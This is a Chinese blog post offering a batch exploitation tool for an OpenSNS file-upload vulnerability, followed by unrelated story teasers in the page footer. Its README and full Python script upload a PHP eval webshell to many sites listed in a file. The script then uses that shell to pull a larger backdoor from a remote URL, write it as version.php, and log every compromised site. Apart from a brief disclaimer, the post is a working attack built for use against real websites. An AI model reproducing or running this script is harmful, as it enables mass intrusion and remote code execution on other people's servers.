OpenSNS文件上传漏洞分析与利用


分析 :


前几天发现了一篇文章 , 写的是OpenSNS的一个文件上传漏洞 , 根据作者的思路尝试了一下 , 发现真的可以上传文件
写了一个批量利用的脚本分享出来

参考资料 :

  1. 出处(漏洞原文 : opensns前台无限制Getshell)
  2. preg_match
  3. strstr()

利用 :


利用脚本下载地址 : 百度云

README.txt

OpenSNS文件上传漏洞利用工具
---------------------------
安全声明 : 
脚本仅用于安全测试与技术交流 , 严禁用于其他用途 , 违者所造成的后果与作者无关!
---------------------------
用法 : 
1. 安装python2.7运行环境
2. 安装python requests模块
3. 搜集网站域名信息 , 保存在当前文件夹下的urls.txt中 , 注意域名后不需要斜杠 , 而且域名需要带上协议 , 如 : http://
4. 在OpenSNS中配置如下信息 : 
    # config-start 
    light_shell_content = "<?php eval($_POST['c']);?>" # 小马内容
    shell_content_url = "http://.../backdoor.txt" # 大马内容 , 需要放在公网上 , 以文本的形式
    shell_file_name = "version.php" # 大马文件名(上传到服务器上的文件名)
    delete_light_shell = False # 是否需要删除小马
    # config-end
5. 运行Python脚本OpenSNS.py即可
---------------------------
结果 : 
所有结果保存在当前文件夹中
fail.txt    利用失败的网站
success.txt 利用成功的网站
shell.txt   大马地址
light_shell.txt 小马地址

OpenSNS.py

#coding:utf8
import requests
import base64
import json
import sys
import winsound

# config-start 
light_shell_content = "<?php eval($_POST['c']);?>" # 小马内容
shell_content_url = "http://.../backdoor.txt" # 大马内容 , 需要放在公网上 , 以文本的形式
shell_file_name = "version.php" # 大马文件名(上传到服务器上的文件名)
delete_light_shell = False # 是否需要删除小马
# config-end

code = "file_put_contents('version.php',file_get_contents('" + shell_content_url + "'));"
postData = {'data':'data:image/php;base64,' + base64.b64encode(light_shell_content)}

sites = open("urls.txt","r") # 读取所有待利用的网站

# 去重
my_sites = set()
for site in sites:
    my_sites.add(site[0:-1])

success_sites = open('success.txt','a+') # 尝试过 , 已经成功
fail_sites = open("fail.txt","a+") # 尝试过 , 但是失败

success_sites_list = []
fail_sites_list = []

number = len(my_sites)
print u"读取URL完成 : ",
print str(number) + u"条"

scaned_number = 0

for site in my_sites:
    scaned_number += 1
    print "---------- " + str(scaned_number) + " / " + str(number) + " ----------"
    print site
    # 开始利用
    if site in fail_sites:
        print "Error : This site have been hacked , but failed."
        continue
    elif site in success_sites:
        print "Error : The shell have been uploaded to the site."
        continue
    else:
        url = site + "/index.php?s=/Core/File/uploadPictureBase64.html"
        try:
            response = requests.post(url, data=postData, timeout=10)
            content = response.text.encode("GB18030");
            if content.startswith("{\"status\":") and content.endswith(".php\"}"):
                success_json = json.loads(content)
                success_path = success_json['path']
                success_path = success_path.replace("\\/","/")
                print u"成功上传小马" + "\t" + success_path
                temp = success_path.split("/")
                size = len(temp)
                little_path = temp[size - 1]
                success_exploit = success_path + "?c=" + code
                requests.get(success_exploit)
                path = success_path.replace(little_path, "")
                print u"成功写入大马!\t" + path + shell_file_name
                if delete_light_shell:
                    requests.get(success_path + "?c=system('rm " + little_path + "');")
                    print u"已经删除小马!"

                # 报警提示
                winsound.Beep(1000,250)

                # 将成功的域名写入日志文件
                success_log = open('success.txt','a+')
                success_log.write(site + "\n")
                success_log.close()

                if not delete_light_shell:
                    # 写入小马地址
                    light_shell_log = open("light_shell.txt", "a+")
                    light_shell_log.write(success_path + "\r\n")
                    light_shell_log.close

                # 写入大马地址
                shell_log = open("shell.txt", "a+")
                shell_log.write(path + shell_file_name + "\r\n")
                shell_log.close

                # 将成功的域名加入List
                success_sites_list.append(site)

            else:
                # 将失败的域名写入日志文件
                error_url = open('fail.txt', 'a+')
                error_url.write(site + "\n")
                error_url.close()

                # 将失败的域名加入List
                fail_sites_list.append(site)

                # 打印日志信息到控制台
                print "Error : Can't upload the shell"

        except Exception as e:
            # 打印错误信息
            print e
            continue

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 221,888评论 6 515
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 94,677评论 3 399
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 168,386评论 0 360
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 59,726评论 1 297
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,729评论 6 397
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 52,337评论 1 310
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,902评论 3 421
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,807评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 46,349评论 1 318
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,439评论 3 340
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,567评论 1 352
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 36,242评论 5 350
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,933评论 3 334
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,420评论 0 24
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,531评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,995评论 3 377
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,585评论 2 359

推荐阅读更多精彩内容